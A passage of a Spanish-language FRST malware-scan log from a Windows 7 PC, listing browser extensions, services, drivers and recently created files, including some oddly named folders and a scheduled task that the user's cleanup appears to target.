FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3508.1109 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2012-03-08] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3555.0308 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2012-03-08] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @videolan.org/vlc,version=2.2.6 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-01-10] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=3.0.6 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-01-10] (VideoLAN -> VideoLAN)
FF Plugin-x32: ZEON/PDF,version=2.0 -> C:\Program Files (x86)\Nuance\PDF Professional 7\bin\nppdf.dll [2011-02-16] (Zeon Corporation -> Zeon Corporation)

Chrome: 
=======
CHR DefaultProfile: Profile 1
CHR Profile: C:\Users\MARCO AVILA\AppData\Local\Google\Chrome\User Data\Default [2020-03-27]
CHR HomePage: Default -> hxxp://google.com.mx/
CHR StartupUrls: Default -> "hxxp://google.com.mx/"
CHR Extension: (Tampermonkey) - C:\Users\MARCO AVILA\AppData\Local\Google\Chrome\User Data\Default\Extensions\dhdgffkkebhmkfjojejmpbldmpobfkfo [2017-11-14]
CHR Extension: (SingleFile Core) - C:\Users\MARCO AVILA\AppData\Local\Google\Chrome\User Data\Default\Extensions\jemlklgaibiijojffihnhieihhagocma [2013-06-24]
CHR Extension: (SingleFile) - C:\Users\MARCO AVILA\AppData\Local\Google\Chrome\User Data\Default\Extensions\mpiodijhokgodhhofbcjdecpffjipkle [2013-06-24]
CHR Extension: (Sistema de pagos de Chrome Web Store) - C:\Users\MARCO AVILA\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-11-14]
CHR Extension: (Vine Client) - C:\Users\MARCO AVILA\AppData\Local\Google\Chrome\User Data\Default\Extensions\oojohjpgmcfnholboljmkbcchbipcbci [2015-06-28]
CHR Extension: (Chrome Media Router) - C:\Users\MARCO AVILA\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-11-14]
CHR Profile: C:\Users\MARCO AVILA\AppData\Local\Google\Chrome\User Data\Profile 1 [2020-03-27]
CHR HomePage: Profile 1 -> hxxps://www.google.com.mx/
CHR StartupUrls: Profile 1 -> "hxxp://google.com.mx/"
CHR Extension: (Google Drive) - C:\Users\MARCO AVILA\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\apdfllckaahabafndbhieahigkjlhalf [2018-10-16]
CHR Extension: (YouTube) - C:\Users\MARCO AVILA\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-09-30]
CHR Extension: (Twitter Media Downloader) - C:\Users\MARCO AVILA\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\cblpjenafgeohmnjknfhpdbdljfkndig [2020-03-15]
CHR Extension: (DownAlbum) - C:\Users\MARCO AVILA\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\cgjnhhjpfcdhbhlcmmjppicjmgfkppok [2020-03-04]
CHR Extension: (Búsqueda de Google) - C:\Users\MARCO AVILA\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-10-31]
CHR Extension: (Twitter) - C:\Users\MARCO AVILA\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\jgeocpdicgmkeemopbanhokmhcgcflmi [2019-08-29]
CHR Extension: (SingleFile) - C:\Users\MARCO AVILA\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\mpiodijhokgodhhofbcjdecpffjipkle [2020-03-27]
CHR Extension: (IDM Integration Module) - C:\Users\MARCO AVILA\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\ngpampappnmepgilojfohadhhmbhlaek [2020-02-05]
CHR Extension: (Sistema de pagos de Chrome Web Store) - C:\Users\MARCO AVILA\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2019-09-30]
CHR Extension: (Gmail) - C:\Users\MARCO AVILA\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2019-03-26]
CHR Extension: (Chrome Media Router) - C:\Users\MARCO AVILA\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2020-03-19]
CHR Profile: C:\Users\MARCO AVILA\AppData\Local\Google\Chrome\User Data\System Profile [2020-03-27]
CHR Extension: (Presentaciones de Google) - C:\Users\MARCO AVILA\AppData\Local\Google\Chrome\User Data\System Profile\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-06-28]
CHR Extension: (Google Docs) - C:\Users\MARCO AVILA\AppData\Local\Google\Chrome\User Data\System Profile\Extensions\aohghmighlieiainnegkcijnfilokake [2015-06-28]
CHR Extension: (Google Drive) - C:\Users\MARCO AVILA\AppData\Local\Google\Chrome\User Data\System Profile\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-06-28]
CHR Extension: (YouTube) - C:\Users\MARCO AVILA\AppData\Local\Google\Chrome\User Data\System Profile\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-06-28]
CHR Extension: (Búsqueda de Google) - C:\Users\MARCO AVILA\AppData\Local\Google\Chrome\User Data\System Profile\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-06-28]
CHR Extension: (Hojas de cálculo de Google) - C:\Users\MARCO AVILA\AppData\Local\Google\Chrome\User Data\System Profile\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-06-28]
CHR Extension: (Gmail) - C:\Users\MARCO AVILA\AppData\Local\Google\Chrome\User Data\System Profile\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-06-28]
CHR HKLM\...\Chrome\Extension: [ngpampappnmepgilojfohadhhmbhlaek] - C:\Program Files (x86)\Internet Download Manager\IDMGCExt.crx [2020-01-21]
CHR HKU\S-1-5-21-1649130365-987012723-906343211-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [apdfllckaahabafndbhieahigkjlhalf] - C:\Users\MARCOA~1\AppData\Local\Google\Drive\user_default\apdfllckaahabafndbhieahigkjlhalf_live.crx <no encontrado>
CHR HKU\S-1-5-21-1649130365-987012723-906343211-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [dhdgffkkebhmkfjojejmpbldmpobfkfo]
CHR HKU\S-1-5-21-1649130365-987012723-906343211-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [lmjegmlicamnimmfhcmpkclmigmmcbeh]
CHR HKLM-x32\...\Chrome\Extension: [fhjnbgadgmmffddcilnbmcieekimilcn] - <no Path/update_url>
CHR HKLM-x32\...\Chrome\Extension: [jfmjfhklogoienhpfnppmbcbjfjnkonk] - <no Path/update_url>
CHR HKLM-x32\...\Chrome\Extension: [ngpampappnmepgilojfohadhhmbhlaek] - C:\Program Files (x86)\Internet Download Manager\IDMGCExt.crx [2020-01-21]
==================== Servicios (Lista blanca) ===================

(Si una entrada es incluida en el fixlist, será eliminada del registro. El archivo no se moverá a menos que sea añadido al listado por separado.)

S4 BstHdAndroidSvc; C:\Program Files (x86)\BlueStacks\HD-Service.exe [387128 2017-04-20] (BlueStack Systems, Inc. -> BlueStack Systems, Inc.)
S4 BstHdLogRotatorSvc; C:\Program Files (x86)\BlueStacks\HD-LogRotatorService.exe [369720 2017-04-20] (BlueStack Systems, Inc. -> BlueStack Systems, Inc.)
S4 BstHdPlusAndroidSvc; C:\Program Files (x86)\BlueStacks\HD-Plus-Service.exe [406584 2017-04-20] (BlueStack Systems, Inc. -> BlueStack Systems, Inc.)
S4 CG6Service; C:\Program Files\CyberGhost 6\CyberGhost.Service.exe [204880 2018-06-11] (CyberGhost SRL -> CyberGhost S.A.)
R2 ePowerSvc; C:\Program Files\Acer\Acer PowerSmart Manager\ePowerSvc.exe [786976 2009-10-02] (Acer Incorporated -> Acer Incorporated)
S4 ExpressVPNService; C:\Program Files (x86)\ExpressVPN\bootstrap\amd64\nssm.exe [438664 2019-08-21] (Express Vpn LLC -> ExpressVPN)
S3 GSService; C:\Windows\SysWOW64\GSService.exe [444640 2014-07-28] (cyan soft ltd -> )
S4 Http_analyzer_v7_netfilter; C:\Program Files (x86)\IEInspector\HTTPAnalyzerFullV7\netFilterService.exe [447384 2017-04-12] (QingHai -> )
S3 IDriverT; C:\Program Files (x86)\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe [69632 2005-04-03] (Macrovision Corporation) [Archivo no firmado]
R2 IsaMonitor; C:\Program Files (x86)\Asistente Infinitum\IsaMonitor.exe [185856 2008-07-23] (Fine Point Technologies, Inc.) [Archivo no firmado]
R2 [email protected]; C:\Windows\[email protected] [26112 2018-11-10] () [Archivo no firmado]
S2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe [6933272 2020-03-27] (Malwarebytes Inc -> Malwarebytes)
R2 msftesql$CSSQL05; c:\Program Files (x86)\Microsoft SQL Server\MSSQL.1\MSSQL\Binn\msftesql.exe [95592 2007-06-22] (Microsoft Corporation -> Microsoft Corporation)
R2 MSSQL$CSSQL05; c:\Program Files (x86)\Microsoft SQL Server\MSSQL.1\MSSQL\Binn\sqlservr.exe [29263712 2008-11-24] (Microsoft Corporation -> Microsoft Corporation)
R2 MSSQL$SQLEXPRESS; c:\Program Files\Microsoft SQL Server\MSSQL10.SQLEXPRESS\MSSQL\Binn\sqlservr.exe [57966424 2010-09-17] (Microsoft Corporation -> Microsoft Corporation)
R2 MWLService; C:\Program Files (x86)\EgisTec\MyWinLocker 3\x86\\MWLService.exe [305448 2009-09-10] (EGIS TECHNOLOGY INC. -> Egis Technology Inc.)
R2 Net Driver HPZ12; C:\Windows\system32\HPZinw12.dll [71680 2008-12-03] (Hewlett-Packard) [Archivo no firmado]
S2 nlsvc; C:\Program Files\NetLimiter 3\nlsvc.exe [1845248 2011-03-21] (Locktime Software) [Archivo no firmado]
R2 ODDPwrSvc; C:\Program Files\Acer\Optical Drive Power Management\ODDPWRSvc.exe [158240 2009-09-04] (Acer Incorporated -> Acer Incorporated)
R2 Pml Driver HPZ12; C:\Windows\system32\HPZipm12.dll [89600 2008-12-03] (Hewlett-Packard) [Archivo no firmado]
S4 SQLAgent$SQLEXPRESS; c:\Program Files\Microsoft SQL Server\MSSQL10.SQLEXPRESS\MSSQL\Binn\SQLAGENT.EXE [430424 2010-09-17] (Microsoft Corporation -> Microsoft Corporation)
S2 SZASSIST; C:\Program Files (x86)\Clarus\Samsung SecretZone\SZAssistSVC.exe [90112 2010-07-30] (Clarus, Inc.) [Archivo no firmado]
R2 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [11446104 2019-04-24] (TeamViewer GmbH -> TeamViewer GmbH)
R2 UleadBurningHelper; C:\Program Files (x86)\Common Files\Ulead Systems\DVD\ULCDRSvr.exe [49152 2006-09-28] (Ulead Systems, Inc.) [Archivo no firmado]
S4 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-26] (Microsoft Windows -> Microsoft Corporation)
R2 wlidsvc; C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE [2292096 2011-03-28] (Microsoft Corporation -> Microsoft Corp.)
S2 Greg_Service; C:\Program Files (x86)\Acer\Registration\GregHSRW.exe [X]
S2 NTI IScheduleSvc; C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\IScheduleSvc.exe [X]
S3 NTIBackupSvc; C:\Program Files (x86)\NewTech Infosystems\NTI Backup Now 5\BackupSvc.exe [X]
S2 NTISchedulerSvc; C:\Program Files (x86)\NewTech Infosystems\NTI Backup Now 5\SchedulerSvc.exe [X]
S2 RS_Service; C:\Program Files (x86)\Acer\Acer VCM\RS_Service.exe [X]
S2 Updater Service; C:\Program Files\Acer\Acer Updater\UpdaterService.exe [X]

===================== Controladores (Lista blanca) ===================

(Si una entrada es incluida en el fixlist, será eliminada del registro. El archivo no se moverá a menos que sea añadido al listado por separado.)

U5 AppMgmt; C:\Windows\system32\svchost.exe [27136 2009-07-13] (Microsoft Windows -> Microsoft Corporation) <==== ATENCIÓN (no ServiceDLL)
S3 BstHdDrv; C:\Program Files (x86)\BlueStacks\HD-Hypervisor-amd64.sys [152672 2017-04-20] (Bluestack Systems, Inc. -> BlueStack Systems)
S3 BstkDrv; C:\Program Files (x86)\BlueStacks\BstkDrv.sys [270904 2017-04-19] (Bluestack Systems, Inc. -> Bluestack System Inc. )
R3 debutfilter; C:\Windows\System32\DRIVERS\debutfilterx64.sys [34512 2015-11-15] (NCH Software -> )
S3 DrmRAudio; C:\Windows\System32\drivers\DrmRAudio.sys [36064 2014-07-28] (cyan soft ltd -> Windows (R) Win 7 DDK provider)
S3 expressvpnsplittunnel; C:\Program Files (x86)\ExpressVPN\splittunnel\expressvpnsplittunnel.sys [18800 2019-08-21] (ExprsVPN LLC -> )
S3 hitmanpro37; C:\Windows\system32\drivers\hitmanpro37.sys [54736 2017-04-15] (SurfRight B.V. -> )
R3 L1C; C:\Windows\System32\DRIVERS\L1C62x64.sys [58880 2009-07-27] (Microsoft Windows Hardware Compatibility Publisher -> Atheros Communications, Inc.)
S3 L1E; C:\Windows\System32\DRIVERS\L1E62x64.sys [54272 2009-06-19] (Microsoft Windows -> Atheros Communications, Inc.)
S3 mdf15; C:\Program Files (x86)\Clarus\Samsung SecretZone\mdf15.sys [12288 2010-03-18] () [Archivo no firmado]
S3 mvd21; C:\Program Files (x86)\Clarus\Samsung SecretZone\mvd21.sys [64512 2010-06-14] () [Archivo no firmado]
R1 netfilter_v76; C:\Windows\System32\drivers\netfilter_v76.sys [66000 2015-04-11] (Anqing Inspector Software Ltd. -> Windows (R) Win 7 DDK provider) [Archivo no firmado]
S3 netr28ux; C:\Windows\System32\DRIVERS\netr28ux.sys [867328 2009-06-10] (Microsoft Windows -> Ralink Technology Corp.)
R1 nltdi; C:\Program Files\NetLimiter 3\nltdi.sys [88200 2011-03-21] (Locktime Software s.r.o. -> Locktime Software)
R2 npf; C:\Windows\system32\drivers\npf.sys [36600 2017-01-02] (Riverbed Technology, Inc. -> Riverbed Technology, Inc.)
S3 RSUSBSTOR; C:\Windows\System32\Drivers\RtsUStor.sys [216064 2009-06-04] (Microsoft Windows Hardware Compatibility Publisher -> Realtek Semiconductor Corp.)
R1 SCDEmu; C:\Windows\System32\Drivers\SCDEmu.sys [90544 2009-07-26] (Fenghua Lee -> PowerISO Computing, Inc.)
R0 sptd; C:\Windows\System32\Drivers\sptd.sys [834544 2010-07-05] () [Archivo no firmado]
S3 StkTMini; C:\Windows\System32\Drivers\StkTMini.sys [528256 2007-11-15] (Syntek Semiconductor Ltd. -> Syntek)
S3 tap0901; C:\Windows\System32\DRIVERS\tap0901.sys [27136 2016-04-21] (OpenVPN Technologies, Inc. -> The OpenVPN Project)
S3 tapexpressvpn; C:\Windows\System32\DRIVERS\tapexpressvpn.sys [36208 2019-08-21] (ExprsVPN LLC -> The OpenVPN Project)
S3 taphss6; C:\Windows\System32\DRIVERS\taphss6.sys [42184 2014-05-16] (AnchorFree Inc -> Anchorfree Inc.)
S3 tapnordvpn; C:\Windows\System32\DRIVERS\tapnordvpn.sys [35592 2018-07-24] (TEFINCOM S.A. -> The OpenVPN Project)
S3 tapse01; C:\Windows\System32\DRIVERS\tapse01.sys [39096 2014-12-02] (SurfEasy Inc -> The OpenVPN Project)
S3 cpuz137; \??\C:\Users\MARCOA~1\AppData\Local\Temp\cpuz137\cpuz137_x64.sys [X] <==== ATENCIÓN
S3 hfFilter; system32\drivers\hfFilter.sys [X]
S3 JakNDisMP; system32\DRIVERS\JakNDis.sys [X]
S2 MBAMChameleon; \SystemRoot\System32\Drivers\MbamChameleon.sys [X]
S3 RtsUIR; system32\DRIVERS\Rts516xIR.sys [X]
S3 USBCCID; system32\DRIVERS\RtsUCcid.sys [X]
S3 VMnetAdapter; system32\DRIVERS\vmnetadapter.sys [X]

==================== NetSvcs (Lista blanca) ===================

(Si una entrada es incluida en el fixlist, será eliminada del registro. El archivo no se moverá a menos que sea añadido al listado por separado.)


==================== Un mes (creado) ===================

(Si una entrada es incluida en el fixlist, el archivo/carpeta será eliminado/a.)

2020-03-27 19:41 - 2020-03-27 19:41 - 000005366 _____ C:\Users\MARCO AVILA\Desktop\JRT.txt
2020-03-27 19:27 - 2020-03-27 19:27 - 000008583 _____ C:\Users\MARCO AVILA\Desktop\AdwCleaner[C00].txt
2020-03-27 19:19 - 2020-03-27 19:23 - 000000000 ____D C:\AdwCleaner
2020-03-27 19:05 - 2020-03-27 19:05 - 000034434 _____ C:\Users\MARCO AVILA\Desktop\malwarebytes informe.txt
2020-03-27 18:05 - 2020-03-27 18:05 - 000000000 ____D C:\Users\MARCO AVILA\AppData\Local\mbam
2020-03-27 18:04 - 2020-03-27 18:04 - 000001952 _____ C:\Users\Public\Desktop\Malwarebytes.lnk
2020-03-27 18:04 - 2020-03-27 18:04 - 000001952 _____ C:\ProgramData\Desktop\Malwarebytes.lnk
2020-03-27 18:04 - 2020-03-27 18:04 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes
2020-03-27 18:01 - 2020-03-27 18:01 - 000000000 ____D C:\Program Files\Malwarebytes
2020-03-27 16:41 - 2020-03-27 16:41 - 005548264 _____ (Microsoft Corporation) C:\Windows\system32\ntkrnlmp.exe
2020-03-27 16:41 - 2020-03-27 16:41 - 000634432 _____ (Microsoft Corporation) C:\Windows\system32\osloader.exe
2020-03-27 15:48 - 2020-03-27 15:48 - 001790024 _____ (Malwarebytes) C:\Users\MARCO AVILA\Desktop\JRT.exe
2020-03-27 15:46 - 2020-03-27 15:46 - 008199856 _____ (Malwarebytes) C:\Users\MARCO AVILA\Desktop\adwcleaner_8.0.3.exe
2020-03-27 15:45 - 2020-03-27 15:45 - 022267336 _____ (Piriform Software Ltd) C:\Users\MARCO AVILA\Desktop\ccsetup565.exe
2020-03-27 15:45 - 2020-03-27 15:45 - 001957784 _____ (Malwarebytes) C:\Users\MARCO AVILA\Desktop\MBSetup.exe
2020-03-26 20:32 - 2020-03-27 18:01 - 000153312 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbae64.sys
2020-03-26 18:55 - 2020-03-26 19:05 - 000080713 _____ C:\Users\MARCO AVILA\Desktop\Addition.txt
2020-03-26 18:49 - 2020-03-27 19:44 - 000043213 _____ C:\Users\MARCO AVILA\Desktop\FRST.txt
2020-03-26 16:36 - 2020-03-27 16:59 - 000001191 _____ C:\Users\Public\Desktop\Revo Uninstaller.lnk
2020-03-26 16:36 - 2020-03-27 16:59 - 000001191 _____ C:\ProgramData\Desktop\Revo Uninstaller.lnk
2020-03-26 16:36 - 2020-03-26 16:36 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Revo Uninstaller
2020-03-26 16:36 - 2020-03-26 16:36 - 000000000 ____D C:\Program Files\VS Revo Group
2020-03-26 16:34 - 2020-03-26 16:34 - 007432520 _____ (VS Revo Group ) C:\Users\MARCO AVILA\Desktop\revosetup.exe
2020-03-26 14:26 - 2020-03-27 19:43 - 000000000 ____D C:\FRST
2020-03-26 14:22 - 2020-03-26 14:22 - 002279936 _____ (Farbar) C:\Users\MARCO AVILA\Desktop\FRST64.exe
2020-03-26 11:43 - 2020-03-27 18:56 - 000000000 ____D C:\Windows\system32\Tasks\System
2020-03-26 11:40 - 2020-03-27 19:10 - 000000000 ____D C:\ProgramData\ErrorResponder
2020-03-26 11:40 - 2020-03-27 19:02 - 000000000 ____D C:\Program Files (x86)\Orchestrale
2020-03-26 11:39 - 2020-03-27 19:35 - 000000510 _____ C:\Windows\Tasks\Adobe Flash sdk Files Update up_2020326.job
2020-03-26 11:39 - 2020-03-26 11:46 - 000000000 ____D C:\ProgramData\SGZPftQsRObztM
2020-03-26 11:39 - 2020-03-26 11:45 - 000000000 ____D C:\ProgramData\pBjXawQUXRlgujtt
2020-03-26 11:39 - 2020-03-26 11:39 - 000002948 _____ C:\Windows\system32\Tasks\Adobe Flash sdk Files Update up_2020326
2020-03-26 11:39 - 2020-03-26 11:39 - 000000000 ____D C:\ProgramData\rkitjuoutqb
2020-03-26 11:39 - 2020-03-26 11:39 - 000000000 ____D C:\ProgramData\Oded
2020-03-26 11:39 - 2020-03-26 11:39 - 000000000 ____D C:\ProgramData\Newf
2020-03-26 11:39 - 2020-03-26 11:39 - 000000000 ____D C:\ProgramData\Komare
2020-03-26 11:38 - 2020-03-26 11:38 - 000000000 ____D C:\Program Files (x86)\kiss
2020-03-26 11:35 - 2020-03-27 19:02 - 000000000 ____D C:\Program Files (x86)\MaRS
2020-03-26 11:33 - 2020-03-26 11:33 - 000069888 _____ C:\Users\MARCO AVILA\AppData\Local\Config.xml
2020-03-26 11:28 - 2020-03-26 11:48 - 000000000 ____D C:\Users\MARCO AVILA\AppData\Local\inetinfoservice
2020-03-25 18:28 - 2020-03-26 22:29 - 000000000 ____D C:\Users\MARCO AVILA\AppData\Roaming\TimerUtc
2020-03-25 18:13 - 2020-03-25 18:13 - 000000000 ____D C:\Users\MARCO AVILA\AppData\Roaming\PatchMyPC
2020-03-25 18:13 - 2020-03-25 18:13 - 000000000 ____D C:\Users\MARCO AVILA\AppData\Local\Patch_My_PC,_LLC
2020-03-25 16:27 - 2020-03-25 16:27 - 000000000 ____D C:\Users\MARCO AVILA\AppData\Local\cache
2020-03-25 16:09 - 2020-03-25 16:09 - 000000000 ____D C:\Users\MARCO AVILA\AppData\Local\mbamtray
2020-03-25 16:08 - 2020-03-25 16:08 - 000000000 ____D C:\ProgramData\MB2Migration
2020-03-25 14:28 - 2016-09-02 09:40 - 000631176 _____ (Microsoft Corporation) C:\Windows\system32\winresume.efi
2020-03-25 14:28 - 2016-09-02 09:35 - 005548264 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2020-03-25 14:28 - 2016-09-02 09:35 - 000706280 _____ (Microsoft Corporation) C:\Windows\system32\winload.efi
2020-03-25 14:28 - 2016-09-02 09:35 - 000154856 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecpkg.sys
2020-03-25 14:28 - 2016-09-02 09:35 - 000095464 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecdd.sys
2020-03-25 14:28 - 2016-09-02 09:31 - 000503808 _____ (Microsoft Corporation) C:\Windows\system32\srcore.dll
2020-03-25 14:28 - 2016-09-02 09:31 - 000362496 _____ (Microsoft Corporation) C:\Windows\system32\wow64win.dll
2020-03-25 14:28 - 2016-09-02 09:31 - 000243712 _____ (Microsoft Corporation) C:\Windows\system32\wow64.dll
2020-03-25 14:28 - 2016-09-02 09:31 - 000215552 _____ (Microsoft Corporation) C:\Windows\system32\winsrv.dll
2020-03-25 14:28 - 2016-09-02 09:31 - 000210432 _____ (Microsoft Corporation) C:\Windows\system32\wdigest.dll
2020-03-25 14:28 - 2016-09-02 09:31 - 000086528 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2020-03-25 14:28 - 2016-09-02 09:30 - 001464320 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
2020-03-25 14:28 - 2016-09-02 09:30 - 000690688 _____ (Microsoft Corporation) C:\Windows\system32\adtschema.dll
2020-03-25 14:28 - 2016-09-02 09:30 - 000463872 _____ (Microsoft Corporation) C:\Windows\system32\certcli.dll
2020-03-25 14:28 - 2016-09-02 09:30 - 000312320 _____ (Microsoft Corporation) C:\Windows\system32\ncrypt.dll
2020-03-25 14:28 - 2016-09-02 09:30 - 000190464 _____ (Microsoft Corporation) C:\Windows\system32\rpchttp.dll
2020-03-25 14:28 - 2016-09-02 09:30 - 000034816 _____ (Microsoft Corporation) C:\Windows\system32\appidsvc.dll
2020-03-25 14:28 - 2016-09-02 09:21 - 003944680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntoskrnl.exe
2020-03-25 14:28 - 2016-09-02 09:18 - 001314112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntdll.dll
2020-03-25 14:28 - 2016-09-02 09:16 - 000690688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\adtschema.dll
2020-03-25 14:28 - 2016-09-02 09:16 - 000666112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpcrt4.dll
2020-03-25 14:28 - 2016-09-02 09:16 - 000644096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\advapi32.dll
2020-03-25 14:28 - 2016-09-02 09:16 - 000553472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kerberos.dll
2020-03-25 14:28 - 2016-09-02 09:16 - 000342528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\certcli.dll
2020-03-25 14:28 - 2016-09-02 09:16 - 000254464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\schannel.dll
2020-03-25 14:28 - 2016-09-02 09:16 - 000223232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ncrypt.dll
2020-03-25 14:28 - 2016-09-02 09:16 - 000172032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wdigest.dll
2020-03-25 14:28 - 2016-09-02 09:16 - 000141312 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpchttp.dll
2020-03-25 14:28 - 2016-09-02 09:02 - 000148480 _____ (Microsoft Corporation) C:\Windows\system32\appidpolicyconverter.exe
2020-03-25 14:28 - 2016-09-02 08:58 - 000338432 _____ (Microsoft Corporation) C:\Windows\system32\conhost.exe
2020-03-25 14:28 - 2016-09-02 08:55 - 000159744 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb.sys
2020-03-25 14:28 - 2016-09-02 08:54 - 000291328 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb10.sys
2020-03-25 14:28 - 2016-09-02 08:54 - 000129536 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb20.sys
2020-03-25 14:28 - 2016-06-06 10:50 - 001483264 _____ (Microsoft Corporation) C:\Windows\system32\crypt32.dll
2020-03-25 14:28 - 2016-06-06 09:23 - 001176064 _____ (Microsoft Corporation) C:\Windows\SysWOW64\crypt32.dll
2020-03-25 14:28 - 2016-05-13 16:09 - 000192512 _____ (Microsoft Corporation) C:\Windows\system32\wuwebv.dll
2020-03-25 14:28 - 2016-05-13 16:09 - 000098816 _____ (Microsoft Corporation) C:\Windows\system32\wudriver.dll
2020-03-25 14:28 - 2016-05-13 16:07 - 000091136 _____ (Microsoft Corporation) C:\Windows\system32\WinSetupUI.dll
2020-03-25 14:28 - 2016-05-13 15:55 - 002607104 _____ (Microsoft Corporation) C:\Windows\system32\wuaueng.dll
2020-03-25 14:28 - 2016-05-13 15:53 - 000709120 _____ (Microsoft Corporation) C:\Windows\system32\wuapi.dll
2020-03-25 14:28 - 2016-05-13 15:53 - 000037888 _____ (Microsoft Corporation) C:\Windows\system32\wuapp.exe
2020-03-25 14:28 - 2016-05-13 15:52 - 000140288 _____ (Microsoft Corporation) C:\Windows\system32\wuauclt.exe
2020-03-25 14:28 - 2016-05-13 15:52 - 000037888 _____ (Microsoft Corporation) C:\Windows\system32\wups2.dll
2020-03-25 14:28 - 2016-05-13 15:52 - 000012288 _____ (Microsoft Corporation) C:\Windows\system32\wu.upgrade.ps.dll
2020-03-25 14:28 - 2016-05-13 15:38 - 000573440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuapi.dll
2020-03-25 14:28 - 2016-05-13 15:38 - 000093696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wudriver.dll
2020-03-25 14:28 - 2016-05-13 15:38 - 000035328 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuapp.exe
2020-03-25 14:28 - 2016-05-13 15:38 - 000030208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wups.dll
2020-03-25 14:28 - 2016-05-12 11:14 - 000862208 _____ (Microsoft Corporation) C:\Windows\system32\oleaut32.dll
2020-03-25 14:28 - 2016-05-12 09:18 - 000572416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\oleaut32.dll
2020-03-25 14:28 - 2016-05-12 07:05 - 000459640 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\cng.sys
2020-03-25 14:28 - 2016-05-12 07:05 - 000297984 _____ (Microsoft Corporation) C:\Windows\system32\bcryptprimitives.dll
2020-03-25 14:28 - 2016-05-12 07:04 - 000249352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\bcryptprimitives.dll
2020-03-25 14:28 - 2016-05-04 11:21 - 000114408 _____ (Microsoft Corporation) C:\Windows\system32\consent.exe
2020-03-25 14:28 - 2016-05-04 11:17 - 003244032 _____ (Microsoft Corporation) C:\Windows\system32\msi.dll
2020-03-25 14:28 - 2016-05-04 11:17 - 002365440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msi.dll
2020-03-25 14:28 - 2016-05-04 09:04 - 000128512 _____ (Microsoft Corporation) C:\Windows\system32\msiexec.exe
2020-03-25 14:28 - 2016-02-05 12:56 - 000020480 _____ (Microsoft Corporation) C:\Windows\system32\tbs.dll
2020-03-25 14:28 - 2016-02-05 12:54 - 000109568 _____ (Microsoft Corporation) C:\Windows\system32\fveapibase.dll
2020-03-25 14:28 - 2016-02-05 11:33 - 000015360 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tbs.dll
2020-03-25 14:28 - 2015-06-03 14:21 - 000451080 _____ (Microsoft Corporation) C:\Windows\system32\fveapi.dll
